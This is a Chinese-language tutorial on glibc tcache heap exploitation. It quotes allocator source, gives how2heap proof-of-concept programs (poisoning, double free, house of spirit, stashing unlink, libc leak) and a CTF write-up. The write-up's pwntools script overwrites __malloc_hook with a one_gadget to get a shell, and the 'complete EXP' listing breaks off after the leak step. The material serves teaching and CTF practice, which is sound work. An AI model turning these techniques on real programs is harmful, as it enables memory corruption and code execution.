tcache attack

Tcache Attack

tcache让堆利用更加简单：

tcache回顾：

在 tcache 中新增了两个结构体，分别是 tcache_entry 和 tcache_perthread_struct：

/* We overlay this structure on the user-data portion of a chunk when the chunk is stored in the per-thread cache.  */
typedef struct tcache_entry
{
  /* Link to the following entry of the same list; tcache_put stores the
     previous list head here when a chunk is pushed.  */
  struct tcache_entry *next;
} tcache_entry;

/* There is one of these for each thread, which contains the per-thread cache (hence "tcache_perthread_struct").  Keeping overall size low is mildly important.  Note that COUNTS and ENTRIES are redundant (we could have just counted the linked list each time), this is for performance reasons.  */
typedef struct tcache_perthread_struct
{
  /* counts[i] is incremented by tcache_put and decremented by tcache_get
     for bin i.  Note the element type is char.  */
  char counts[TCACHE_MAX_BINS];
  /* entries[i] is the head of the singly linked list for bin i.  */
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

static __thread tcache_perthread_struct *tcache = NULL;

其中有两个重要的函数， tcache_get() 和 tcache_put():

/* Push CHUNK onto the head of tcache bin TC_IDX and bump that bin's count.
   The only validation performed here is the assert on TC_IDX; the chunk
   itself and the current count are not inspected.  */
static void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  /* The entry is overlaid on the chunk's user-data area.  */
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);
  /* Head insertion: the new entry points at the old head ...  */
  e->next = tcache->entries[tc_idx];
  /* ... and then becomes the new head.  */
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

/* Pop and return the head entry of tcache bin TC_IDX, decrementing the
   bin's count.  The returned pointer is the entry itself (user memory).  */
static void *
tcache_get (size_t tc_idx)
{
  /* The head is read before either assert below runs.  */
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  /* e->next is installed as the new head without any validation of the
     address it holds.  */
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  return (void *) e;
}

这两个函数会在函数 _int_free 和 __libc_malloc 的开头被调用，其中 tcache_put 当所请求的分配大小不大于0x408并且当给定大小的 tcache bin 未满时调用。一个 tcache bin 中的最大块数mp_.tcache_count是7。

/* This is another arbitrary limit, which tunables can change.  Each
   tcache bin will hold at most this number of chunks.  */
# define TCACHE_FILL_COUNT 7
#endif

再复习一遍 tcache_get() 的源码：

/* Remove the first entry of tcache bin TC_IDX and hand it back to the
   caller.  Apart from the two asserts nothing is verified: whatever value
   is stored in e->next becomes the next list head.  */
static __always_inline void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  /* Bounds check on the bin index.  */
  assert (tc_idx < TCACHE_MAX_BINS);
  /* The bin must have a non-null head.  */
  assert (tcache->entries[tc_idx] > 0);
  /* Unlink: the successor stored in the entry replaces the head.  */
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  return (void *) e;
}

在 tcache_get 中，只有两个 assert：检查 tc_idx 是否越界，以及 tcache->entries[tc_idx] 是否非空。此外，我们可以将 tcache 当作一个类似于 fastbin 的单链表，只是它的 check 并没有 fastbin 那么复杂：取出 chunk 时仅仅执行 tcache->entries[tc_idx] = e->next;，不会检查 e->next 指向的地址是否是一个合法的 chunk。

tcache的使用：

内存释放：

可以看到，在 free 函数的最先处理部分，首先检查被释放 chunk 的指针是否对齐、size 是否合法，检查通过后便优先放入 tcache 结构中（此时还没有对前后相邻堆块的状态做任何检查）。

_int_free (mstate av, mchunkptr p, int have_lock)
{
  INTERNAL_SIZE_T size;        /* its size */
  mfastbinptr *fb;             /* associated fastbin */
  mchunkptr nextchunk;         /* next contiguous chunk */
  INTERNAL_SIZE_T nextsize;    /* its size */
  int nextinuse;               /* true if nextchunk is used */
  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
  mchunkptr bck;               /* misc temp for linking */
  mchunkptr fwd;               /* misc temp for linking */

  size = chunksize (p);

  /* Little security check which won't hurt performance: the
     allocator never wrapps around at the end of the address space.
     Therefore we can exclude some size values which might appear
     here by accident or by "design" from some intruder.  */
  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
      || __builtin_expect (misaligned_chunk (p), 0))
    malloc_printerr ("free(): invalid pointer");
  /* We know that each chunk is at least MINSIZE bytes in size or a
     multiple of MALLOC_ALIGNMENT.  */
  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
    malloc_printerr ("free(): invalid size");

  check_inuse_chunk(av, p);

#if USE_TCACHE
  {
    size_t tc_idx = csize2tidx (size);

    if (tcache
      && tc_idx < mp_.tcache_bins
      && tcache->counts[tc_idx] < mp_.tcache_count)
      {
        tcache_put (p, tc_idx);
        return;
      }
  }
#endif

......
}

内存申请：

在内存分配的 malloc 函数中有多处，会将内存块移入 tcache 中。

首先，申请的内存块符合 fastbin 大小时并且在 fastbin 内找到可用的空闲块时，会把该 fastbin 链上的其他内存块放入 tcache 中。
其次，申请的内存块符合 smallbin 大小时并且在 smallbin 内找到可用的空闲块时，会把该 smallbin 链上的其他内存块放入 tcache 中。
当在 unsorted bin 链上循环处理时，当找到大小合适的 chunk 时，并不直接返回，而是先放到 tcache 中，继续处理。

fastbin 的时候：

  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
    {
      idx = fastbin_index (nb);
      mfastbinptr *fb = &fastbin (av, idx);
      mchunkptr pp;
      victim = *fb;

      if (victim != NULL)
    {
      if (SINGLE_THREAD_P)
        *fb = victim->fd;
      else
        REMOVE_FB (fb, pp, victim);
      if (__glibc_likely (victim != NULL))
        {
          size_t victim_idx = fastbin_index (chunksize (victim));
          if (__builtin_expect (victim_idx != idx, 0))
              malloc_printerr ("malloc(): memory corruption (fast)");
          check_remalloced_chunk (av, victim, nb);
#if USE_TCACHE
          /* While we're here, if we see other chunks of the same size,
         stash them in the tcache.  */
          size_t tc_idx = csize2tidx (nb);
          if (tcache && tc_idx < mp_.tcache_bins)
        {
          mchunkptr tc_victim;

          /* While bin not empty and tcache not full, copy chunks.  */
          while (tcache->counts[tc_idx] < mp_.tcache_count
            && (tc_victim = *fb) != NULL)
            {
              if (SINGLE_THREAD_P)
               *fb = tc_victim->fd;
              else
              {
                REMOVE_FB (fb, pp, tc_victim);
                if (__glibc_unlikely (tc_victim == NULL))
                  break;
              }
              tcache_put (tc_victim, tc_idx);
            }
        }
#endif
          void *p = chunk2mem (victim);
          alloc_perturb (p, bytes);
          return p;
        }
    }
    }

tcache 取出：在内存申请的开始部分，首先会判断申请大小块，在 tcache 是否存在，如果存在就直接从 tcache 中摘取，否则再使用_int_malloc 分配。
在循环处理 unsorted bin 内存块时，如果已处理的 chunk 数量超过了上限 mp_.tcache_unsorted_limit，并且之前已经有 chunk 被放入 tcache，就会立即从 tcache 中取出一个返回。该上限默认是 0，即不存在上限。

#if USE_TCACHE
      /* If we've processed as many chunks as we're allowed while
   filling the cache, return one of the cached ones.  */
      ++tcache_unsorted_count;
      if (return_cached
        && mp_.tcache_unsorted_limit > 0
        && tcache_unsorted_count > mp_.tcache_unsorted_limit)
      {
        return tcache_get (tc_idx);
      }
#endif

在循环处理 unsorted bin 内存块后，如果之前曾放入过 tcache 块，则会取出一个并返回。

#if USE_TCACHE
      /* If all the small chunks we found ended up cached, return one now.  */
      if (return_cached)
      {
        return tcache_get (tc_idx);
      }
#endif

tcache利用

1. tcache poisoning

通过覆盖 tcache 中的 next，不需要伪造任何 chunk 结构即可实现 malloc 到任何地址。

以 how2heap 中的 tcache_poisoning 为例：

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <assert.h>

/*
 * tcache poisoning demo (how2heap).
 *
 * Two same-sized chunks are freed into the tcache, then the next pointer
 * stored in the most recently freed one is overwritten with the address of
 * a stack variable.  The second malloc() of that size afterwards returns
 * the stack address, which the final assert verifies.
 *
 * Returns 0 on success; aborts via assert if the poisoned address was not
 * returned.
 */
int main()
{
	// disable buffering
	setbuf(stdin, NULL);
	setbuf(stdout, NULL);

	printf("This file demonstrates a simple tcache poisoning attack by tricking malloc into\n"
		   "returning a pointer to an arbitrary location (in this case, the stack).\n"
		   "The attack is very similar to fastbin corruption attack.\n");
	printf("After the patch https://sourceware.org/git/?p=glibc.git;a=commit;h=77dc0d8643aa99c92bf671352b0a8adde705896f,\n"
		   "We have to create and free one more chunk for padding before fd pointer hijacking.\n\n");

	// Only the address of stack_var is used; its value is never read.
	size_t stack_var;
	// %p requires a void * argument, hence the explicit casts below.
	printf("The address we want malloc() to return is %p.\n", (void *)&stack_var);

	printf("Allocating 2 buffers.\n");
	intptr_t *a = malloc(128);
	printf("malloc(128): %p\n", (void *)a);
	intptr_t *b = malloc(128);
	printf("malloc(128): %p\n", (void *)b);

	printf("Freeing the buffers...\n");
	// a is freed first, so b ends up at the head of the list.
	free(a);
	free(b);

	printf("Now the tcache list has [ %p -> %p ].\n", (void *)b, (void *)a);
	// sizeof yields size_t, which is printed with %zu.
	printf("We overwrite the first %zu bytes (fd/next pointer) of the data at %p\n"
		   "to point to the location to control (%p).\n", sizeof(intptr_t), (void *)b, (void *)&stack_var);
	// Deliberate write into freed memory: this is the vulnerability being simulated.
	b[0] = (intptr_t)&stack_var;
	printf("Now the tcache list has [ %p -> %p ].\n", (void *)b, (void *)&stack_var);

	// First allocation consumes b; the list head is now the stack address.
	printf("1st malloc(128): %p\n", malloc(128));
	printf("Now the tcache list has [ %p ].\n", (void *)&stack_var);

	intptr_t *c = malloc(128);
	printf("2nd malloc(128): %p\n", (void *)c);
	printf("We got the control\n");

	assert((long)&stack_var == (long)c);
	return 0;
}

运行结果是：

分析一下，程序先申请了两个大小是 128 的 chunk（a 和 b），然后依次 free。128 在 tcache 的范围内，因此 free 之后这两个 chunk 都被放到了 tcache 中，调试如下：

可以看到，此时第 8 条 tcache 链上已经有了两个 chunk，从 tcache_perthread_struct 结构体中也能得到同样的结论。

然后修改 tcache 的 next：

此时，第 8 条 tcache 链的 next 已经被改成栈上的地址了。接下来类似 fastbin attack，只需进行两次 malloc(128) 即可控制栈上的空间：

第一次 malloc：

第二次 malloc，即可 malloc 栈上的地址了：

在这里插入图片描述

可以看出 tcache poisoning 这种方法和 fastbin attack 类似，但因为没有 size 的限制（不用再伪造 size 字段了，直接修改头节点的 next 指针即可，前提是该 bin 中 chunk 的数量足够，即 count 不为 0），有了更大的利用范围。

2. tcache dup （double free）

类似 fastbin dup，不过利用的是 tcache_put() 的不严谨：

/* Insert CHUNK at the front of tcache bin TC_IDX.
   Nothing in this function compares CHUNK with entries already in the
   list, and counts[tc_idx] is incremented without being checked.  */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  /* The bin index is the only thing asserted.  */
  assert (tc_idx < TCACHE_MAX_BINS);
  /* If E is already the list head, this makes E point to itself.  */
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

可以看出，tcache_put() 的检查也可以忽略不计（甚至没有对 tcache->counts[tc_idx] 的检查），大幅提高性能的同时安全性也下降了很多。

因为没有任何检查，所以我们可以对同一个 chunk 多次 free，造成循环链表（cyclic list）。

以 how2heap 的 tcache_dup 为例分析，源码如下：

#include <stdio.h>
#include <stdlib.h>

/*
 * tcache double-free demo (how2heap): frees the same chunk twice and then
 * shows that two subsequent allocations of that size return the same
 * address.  Returns 0.
 */
int main()
{
    fprintf(stderr, "This file demonstrates a simple double-free attack with tcache.\n");
    fprintf(stderr, "Allocating buffer.\n");
    int *a = malloc(8);
    /* %p requires a void * argument, hence the casts.  */
    fprintf(stderr, "malloc(8): %p\n", (void *)a);
    fprintf(stderr, "Freeing twice...\n");
    /* Deliberate double free: this is the bug being demonstrated.  */
    free(a);
    free(a);
    fprintf(stderr, "Now the free list has [ %p, %p ].\n", (void *)a, (void *)a);
    fprintf(stderr, "Next allocated buffers will be same: [ %p, %p ].\n", malloc(8), malloc(8));
    return 0;
}

调试一下，第一次 free，tcache 的第一条链放入了一个 chunk：

第二次 free 时，虽然 free 的是同一个 chunk，但因为 tcache_put() 没有做任何检查，因此程序不会 crash，可以看出，这种方法与 fastbin dup 相比也简单了很多（fastbin在free时有头部检查，不能两次释放同一个）：

3. tcache perthread corruption

我们已经知道 tcache_perthread_struct 是整个 tcache 的管理结构，如果能控制这个结构体，那么无论我们 malloc 的 size 是多少，地址都是可控的。

例子，申请到tcache_perthread_struct作为chunk，然后修改其中的值，实现任意大小、任意地址的chunk分配：

地址：[CISCN 2021 初赛]lonelywolf | NSSCTF

题解：[NSSCTF堆][tcache]-CSDN博客

4. tcache house of spirit

拿 how2heap 的源码来讲：

#include <stdio.h>
#include <stdlib.h>

/*
 * tcache house-of-spirit demo (how2heap): writes a forged size value into a
 * stack array, frees a pointer into that array, and then requests a block
 * of the matching size with malloc.
 */
int main()
{
    fprintf(stderr, "This file demonstrates the house of spirit attack on tcache.\n");
    fprintf(stderr, "It works in a similar way to original house of spirit but you don't need to create fake chunk after the fake chunk that will be freed.\n");
    fprintf(stderr, "You can see this in malloc.c in function _int_free that tcache_put is called without checking if next chunk's size and prev_inuse are sane.\n");
    fprintf(stderr, "(Search for strings \"invalid next size\" and \"double free or corruption\")\n\n");

    fprintf(stderr, "Ok. Let's start with the example!.\n\n");


    fprintf(stderr, "Calling malloc() once so that it sets up its memory.\n");
    /* The result is intentionally discarded; only the side effect matters.  */
    malloc(1);

    fprintf(stderr, "Let's imagine we will overwrite 1 pointer to point to a fake chunk region.\n");
    unsigned long long *a; //pointer that will be overwritten
    unsigned long long fake_chunks[10]; //fake chunk region

    fprintf(stderr, "This region contains one fake chunk. It's size field is placed at %p\n", &fake_chunks[1]);

    fprintf(stderr, "This chunk size has to be falling into the tcache category (chunk.size <= 0x410; malloc arg <= 0x408 on x64). The PREV_INUSE (lsb) bit is ignored by free for tcache chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
    fprintf(stderr, "... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
    /* Only element 1 of fake_chunks is initialised; the rest is left as is.  */
    fake_chunks[1] = 0x40; // this is the size


    fprintf(stderr, "Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
    fprintf(stderr, "... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");

    /* The pointer handed to free is the element right after the forged
       size field, i.e. where the user data of the fake chunk would begin.  */
    a = &fake_chunks[2];

    fprintf(stderr, "Freeing the overwritten pointer.\n");
    free(a);

    fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
    /* 0x30 is one of the request sizes the message above says rounds to 0x40.  */
    fprintf(stderr, "malloc(0x30): %p\n", malloc(0x30));
}

运行结果：

这个攻击的目的是控制栈上的内容。先 malloc 一块 chunk 完成堆的初始化，然后在栈上伪造一个 fake chunk 并把它 free 掉，我们会发现，tcache 中会出现栈上 fake_chunk 存放 next 指针的地址：

在这里插入图片描述

通过一次malloc就能申请到该fake_chunk，从而控制栈上的数据。

5. smallbin unlink

在 small bin 中包含有空闲块的时候，会同时将同大小的其他空闲块，放入 tcache 中，此时也会出现解链操作 unlink ，但相比于 unlink 宏，缺少了链完整性校验。因此，原本 unlink 操作在该条件下也可以使用。

6. tcache stashing unlink attack

这种攻击利用的是 tcache bin 有剩余 (数量小于 mp_.tcache_count ，默认为 TCACHE_FILL_COUNT 即 7) 时，同大小的 small bin 会放进 tcache 中 (这种情况可以用 calloc 分配同大小堆块触发，因为 calloc 分配堆块时不从 tcache bin 中选取)。在获取到一个 smallbin 中的一个 chunk 后，如果 tcache 仍有足够空闲位置，会将剩余的 small bin 链入 tcache ，在这个过程中只对第一个 bin 进行了完整性检查，后面的堆块的检查缺失。当攻击者可以写一个 small bin 的 bk 指针时，其可以在任意地址上写一个 libc 地址 (类似 unsorted bin attack 的效果)。构造得当的情况下也可以分配 fake chunk 到任意地址。

这里以 how2heap 中的 tcache_stashing_unlink_attack.c 为例：

我们按照释放的先后顺序称 smallbin[sz] 中的两个 chunk 分别为 chunk0 和 chunk1。我们修改 chunk1 的 bk 为 fake_chunk_addr。同时还要在 fake_chunk_addr->bk 处提前写一个可写地址 writable_addr 。调用 calloc(size-0x10) 的时候会返回给用户 chunk0 (这是因为 smallbin 的 FIFO 分配机制)，假设 tcache[sz] 中有 5 个空闲堆块，则有足够的位置容纳 chunk1 以及 fake_chunk 。在源码的检查中，只对第一个 chunk 的链表完整性做了检测 __glibc_unlikely (bck->fd != victim) ，后续堆块在放入过程中并没有检测。

因为 tcache 的分配机制是 LIFO ，所以位于 chunk1->bk 指针处的 fake_chunk 在链入 tcache 的时候反而会放到链表表头。在下一次调用 malloc(sz-0x10) 时会返回 fake_chunk+0x10 给用户，同时，由于 bin->bk = bck;bck->fd = bin; 的 unlink 操作，会使得 writable_addr+0x10 处被写入一个 libc 地址：

#include <stdio.h>
#include <stdlib.h>

/*
 * tcache stashing unlink attack demo (how2heap).
 *
 * stack_var stands in for the fake chunk.  The program allocates nine
 * 0x90-byte blocks, frees them in a chosen order, overwrites the second
 * word of chunk2's user data with the address of stack_var, and finally
 * calls calloc followed by malloc with the same request size.
 */
int main(){
    unsigned long stack_var[0x10] = {0};
    unsigned long *chunk_lis[0x10] = {0};
    unsigned long *target;

    fprintf(stderr, "This file demonstrates the stashing unlink attack on tcache.\n\n");
    fprintf(stderr, "This poc has been tested on both glibc 2.27 and glibc 2.29.\n\n");
    fprintf(stderr, "This technique can be used when you are able to overwrite the victim->bk pointer. Besides, it's necessary to alloc a chunk with calloc at least once. Last not least, we need a writable address to bypass check in glibc\n\n");
    fprintf(stderr, "The mechanism of putting smallbin into tcache in glibc gives us a chance to launch the attack.\n\n");
    fprintf(stderr, "This technique allows us to write a libc addr to wherever we want and create a fake chunk wherever we need. In this case we'll create the chunk on the stack.\n\n");

    // stack_var plays the role of the fake chunk we want malloc to return
    fprintf(stderr, "Stack_var emulates the fake chunk we want to alloc to.\n\n");
    fprintf(stderr, "First let's write a writeable address to fake_chunk->bk to bypass bck->fd = bin in glibc. Here we choose the address of stack_var[2] as the fake bk. Later we can see *(fake_chunk->bk + 0x10) which is stack_var[4] will be a libc addr after attack.\n\n");

    // stack_var[3] is the slot the messages call fake_chunk->bk
    stack_var[3] = (unsigned long)(&stack_var[2]);

    fprintf(stderr, "You can see the value of fake_chunk->bk is:%p\n\n",(void*)stack_var[3]);
    fprintf(stderr, "Also, let's see the initial value of stack_var[4]:%p\n\n",(void*)stack_var[4]);
    fprintf(stderr, "Now we alloc 9 chunks with malloc.\n\n");

    // allocate chunk0 .. chunk8, all with the same request size
    for(int i = 0;i < 9;i++){
        chunk_lis[i] = (unsigned long*)malloc(0x90);
    }

    // this loop frees six chunks (chunk3 .. chunk8); chunk1 is freed
    // separately below, giving seven frees before chunk0 and chunk2
    fprintf(stderr, "Then we free 7 of them in order to put them into tcache. Carefully we didn't free a serial of chunks like chunk2 to chunk9, because an unsorted bin next to another will be merged into one after another malloc.\n\n");

    for(int i = 3;i < 9;i++){
        free(chunk_lis[i]);
    }

    fprintf(stderr, "As you can see, chunk1 & [chunk3,chunk8] are put into tcache bins while chunk0 and chunk2 will be put into unsorted bin.\n\n");

    // seventh free of this size
    free(chunk_lis[1]);
    // eighth and ninth free: chunk0 first, then chunk2 (not adjacent to each other)
    free(chunk_lis[0]);
    free(chunk_lis[2]);

    // a larger request, made so that chunk0 and chunk2 get sorted into the small bin
    fprintf(stderr, "Now we alloc a chunk larger than 0x90 to put chunk0 and chunk2 into small bin.\n\n");

    malloc(0xa0);//>0x90

    // two allocations of the original size; results are intentionally discarded
    fprintf(stderr, "Then we malloc two chunks to spare space for small bins. After that, we now have 5 tcache bins and 2 small bins\n\n");

    malloc(0x90);
    malloc(0x90);

    fprintf(stderr, "Now we emulate a vulnerability that can overwrite the victim->bk pointer into fake_chunk addr: %p.\n\n",(void*)stack_var);

    // write through the already-freed chunk2: word 1 of its user data is
    // the field the messages call victim->bk
    /*VULNERABILITY*/
    chunk_lis[2][1] = (unsigned long)stack_var;
    /*VULNERABILITY*/

    // calloc with the same request size triggers the attack
    fprintf(stderr, "Finally we alloc a 0x90 chunk with calloc to trigger the attack. The small bin preiously freed will be returned to user, the other one and the fake_chunk were linked into tcache bins.\n\n");

    calloc(1,0x90);

    fprintf(stderr, "Now our fake chunk has been put into tcache bin[0xa0] list. Its fd pointer now point to next free chunk: %p and the bck->fd has been changed into a libc addr: %p\n\n",(void*)stack_var[2],(void*)stack_var[4]);

    // this allocation is expected to return the fake chunk on the stack
    target = malloc(0x90);

    fprintf(stderr, "As you can see, next malloc(0x90) will return the region our fake chunk: %p\n",(void*)target);
    return 0;
}

这个 poc 用栈上的一个数组模拟 fake_chunk 。首先构造出 5 个 tcache chunk 和 2 个 smallbin chunk 的情况。模拟 UAF 漏洞修改第二个 small bin chunk（即 chunk_lis[2]）的 bk 为 fake_chunk ，在 calloc(1,0x90) 的时候触发攻击。

我们在 calloc 处下断点，调用前查看堆块排布情况。此时 tcache[0xa0] 中有 5 个空闲块。可以看到 chunk1->bk 已经被改为了 fake_chunk_addr 。而 fake_chunk->bk 也写上了一个可写地址。由于 smallbin 是按照 bk 指针寻块的，分配得到的顺序应当是 0x55555555b250->0x55555555b390->0x7fffffffdde0 (FIFO) 。调用 calloc 会返回给用户 0x55555555b250+0x10。

在这里插入图片描述

调用 calloc 后再查看堆块排布情况，可以看到 fake_chunk 已经被链入 tcache_entry[8] , 且因为分配顺序变成了 LIFO , 0x7fffffffdde0-0x10 这个块被提到了链表头，下次 malloc(0x90) 即可获得这个块：

其 fd 指向下一个空闲块，在 unlink 过程中 bck->fd = bin 的赋值操作使得 0x7fffffffdde0+0x10 处写入了一个 libc 地址 （与unsortedbin attack写入一个较大的地址一样）。

7. libc leak

在以前的 libc 版本中，我们只需这样：

#include <stdlib.h>
#include <stdio.h>

/*
 * libc address leak demo for allocators without tcache: frees a 0x1000-byte
 * block and prints the first word of its (now freed) user data.
 * Returns 0.
 */
int main()
{
    long *a = malloc(0x1000);
    /* Guard allocation placed after a (author's note: keeps a from being
       merged with the top chunk when it is freed).  */
    malloc(0x10);
    free(a);
    /* Deliberate read of freed memory.  a[0] is a long, so it is converted
       to void * to match the %p conversion.  */
    printf("%p\n", (void *)a[0]);
    return 0;
}

但是在 2.26 及之后的 libc 版本中，如果 chunk 的大小落在 tcache 范围内，我们得先把对应的 tcache bin 填满：

#include <stdlib.h>
#include <stdio.h>

/*
 * libc address leak demo with tcache present: seven blocks of the same
 * size are freed first, then the target block is freed and the first word
 * of its freed user data is printed.  argc and argv are unused.
 * Returns 0.
 */
int main(int argc , char* argv[])
{
    long *t[7];
    long *a = malloc(0x100);
    /* Guard allocation placed right after a (author's note: prevents
       merging with the top chunk).  The pointer itself is not needed.  */
    malloc(0x10);

    /* Fill the tcache bin for this size: allocate seven blocks ...  */
    for (int i = 0; i < 7; i++)
        t[i] = malloc(0x100);
    /* ... and free all of them before touching a.  */
    for (int i = 0; i < 7; i++)
        free(t[i]);

    free(a);
    /* a is put in an unsorted bin because the tcache bin of this size is
       full.  Deliberate read of freed memory; a[0] is a long, so convert it
       to void * for %p.  */
    printf("%p\n", (void *)a[0]);
    return 0;
}

Tcache Check

在最新的 libc 的 commit 中更新了 Tcache 的 double free 的 check：

index 6d7a6a8..f730d7a 100644 (file)
--- a/malloc/malloc.c
+++ b/malloc/malloc.c
@@ -2967,6 +2967,8 @@ mremap_chunk (mchunkptr p, size_t new_size)
 typedef struct tcache_entry
 {
   struct tcache_entry *next;
+  /* This field exists to detect double frees.  */
+  struct tcache_perthread_struct *key;
 } tcache_entry;

 /* There is one of these for each thread, which contains the
@@ -2990,6 +2992,11 @@ tcache_put (mchunkptr chunk, size_t tc_idx)
 {
   tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
   assert (tc_idx < TCACHE_MAX_BINS);
+
+  /* Mark this chunk as "in the tcache" so the test in _int_free will
+     detect a double free.  */
+  e->key = tcache;
+
   e->next = tcache->entries[tc_idx];
   tcache->entries[tc_idx] = e;
   ++(tcache->counts[tc_idx]);
@@ -3005,6 +3012,7 @@ tcache_get (size_t tc_idx)
   assert (tcache->entries[tc_idx] > 0);
   tcache->entries[tc_idx] = e->next;
   --(tcache->counts[tc_idx]);
+  e->key = NULL;
   return (void *) e;
 }

@@ -4218,6 +4226,26 @@ _int_free (mstate av, mchunkptr p, int have_lock)
   {
     size_t tc_idx = csize2tidx (size);

+    /* Check to see if it's already in the tcache.  */
+    tcache_entry *e = (tcache_entry *) chunk2mem (p);
+
+    /* This test succeeds on double free.  However, we don't 100%
+       trust it (it also matches random payload data at a 1 in
+       2^<size_t> chance), so verify it's not an unlikely coincidence
+       before aborting.  */
+    if (__glibc_unlikely (e->key == tcache && tcache)) //通过key找到tcache的地址，进行比较
+      {
+       tcache_entry *tmp;
+       LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
+       for (tmp = tcache->entries[tc_idx];
+            tmp;
+            tmp = tmp->next)
+         if (tmp == e)
+           malloc_printerr ("free(): double free detected in tcache 2");
+       /* If we get here, it was a coincidence.  We've wasted a few
+          cycles, but don't abort.  */
+      }
+
     if (tcache
        && tc_idx < mp_.tcache_bins
        && tcache->counts[tc_idx] < mp_.tcache_count)

通过key找到tcache的地址，进行比较：key值check，如果要绕过可以在free后将key值清0，再释放同一个块，就能绕过检查：

例题1：children_tcache

题目地址：children_tcache

思路：

利用off_by_one创造unlink从而free向后合并，实现chunk之间的重叠，从而泄漏main_arena中的地址。
利用tcache dup实现任意地址分配chunk，进而实现任意地址写数据 ==> 用one_gadget覆盖malloc_hook，从而getshell。

分析：

只有添加、显示、删除三个函数，add函数，其中的read函数存在off_by_null漏洞，会在输入的字符串最后加上00：
delete函数，清空堆指针，没有UAF漏洞，并且chunk在free后会根据申请的大小填充满0xda（在利用off_by_null构造unlink时prev_size中的0xda要消去）：
show函数，结合delete函数来看，同样不存在UAF，会输出堆指针指向的内容：

利用：

因为存在tcache，并且在tcache中的chunk是不能合并的（unlink），所以要申请大于0x410的chunk，释放后才能进入unsortedbin。申请一个0x410的chunk和一个0x500的chunk，用来实现unlink，另外在两个chunk中间申请一个0x18的chunk（实际大小为0x20），来创造unlink，并最后输出泄漏的main_arena中的地址：
```
add(0x410,'s')	#0 实现unlink
add(0x18,'k')	#1 创建unlink
add(0x4f0,'y')	#2 触发unlink
add(0x20,'e')	#3 防止合并
```

利用chunk1创建unlink：清空chunk2的prev_inuse位，在prev_size位伪造大小：

free(0) #为unlink做准备

#清空chunk2的prev_inuse位，并伪造prev_size位，利用循环将prev_size位中的高位清空
free(1)
for i in range(0,9):
    add(0x18-i,b"a"*(0x18-i))   #0
    free(0)

payload0 = b"a"*0x10+p64(0x420+0x20)
add(0x18,payload0)  #申请一个与chunk0同样大小的堆，将合并后的chunk0中的main_arena地址推到chunk1中输出

# 泄漏libc地址
free(2)
add(0x410,b"libc leak") #1
show(0)

p.recv()
addr = u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b'\x00'))
success("main_arena_unsortbin_addr==>"+hex(addr))
main_arena_offset = libc.symbols["__malloc_hook"]+0x10
success("main_arena_offset==>"+hex(main_arena_offset))
libc_base = addr-(main_arena_offset+0x60)
success("libc_addr==>"+hex(libc_base))
malloc_hook_addr = libc.symbols["__malloc_hook"] + libc_base
success("malloc_hook_addr==>"+hex(malloc_hook_addr))

再申请一个size为0x20的chunk，其会与chunk1重叠，再释放掉这两个chunk,就实现了tcache dup：

#tcache dup
add(0x18,b"tcache dup") #2
free(0)
free(2)
add(0x18,p64(malloc_hook_addr)) #0 将next指针改为malloc_hook地址，再次申请就能申请到该地址

add(0x18,b"d")  #2 申请到malloc_hook作为cunk

修改next指针：

最后向malloc_hook中写入onegadget地址：

exeve_addr = one_gadget[2]+libc_base
success("exeve_addr==>"+hex(exeve_addr))
payload = p64(exeve_addr)
add(0x18,payload)
add(0x18,b"get shell")
p.sendline(b"cat flag")
p.interactive()

完整的EXP：

from pwn import *
from LibcSearcher import *
context(os='linux', arch='amd64', log_level='debug')

def debug():
    """Print the PID list pwntools reports for the target `p`, then pause.

    Presumably used to give the operator time to attach a debugger.
    """
    target_pids = proc.pidof(p)
    print(target_pids)
    pause()

# p = remote("node5.buuoj.cn",28220)
p = process("./pwn")
libc = ELF('./libc-2.27.so')
elf = ELF("./pwn")

def add(size,content):
    """Send menu choice 1, then the size, then the content, one line each.

    size is converted to its decimal string and encoded; content is sent
    as given (callers pass bytes).
    """
    for line in (b'1', str(size).encode(), content):
        p.sendline(line)

def show(index):
    """Send menu choice 2, wait for a ':' prompt, then send the index."""
    encoded_index = str(index).encode()
    p.sendline(b'2')
    p.sendlineafter(b':', encoded_index)

def free(index):
    """Send menu choice 3 followed by the index, one line each."""
    menu_choice = b'3'
    encoded_index = str(index).encode()
    p.sendline(menu_choice)
    p.sendline(encoded_index)

one_gadget = [0x4f2be,0x4f2c5,0x4f322,0x10a38c]

add(0x410,b"a") #0
add(0x18,b"a")  #1
add(0x4f0,b"a") #2
add(0x20,b'a')  #3

free(0) #为unlink做准备

#清空chunk2的prev_inuse位，并伪造prev_size位，利用循环将prev_size位中的高位清空
free(1)
for i in range(0,9):
    add(0x18-i,b"a"*(0x18-i))   #0
    free(0)
    print("count",i)

payload0 = b"a"*0x10+p64(0x420+0x20)
add(0x18,payload0)  #0

# 泄漏libc地址
free(2)
add(0x410,b"libc leak") #1
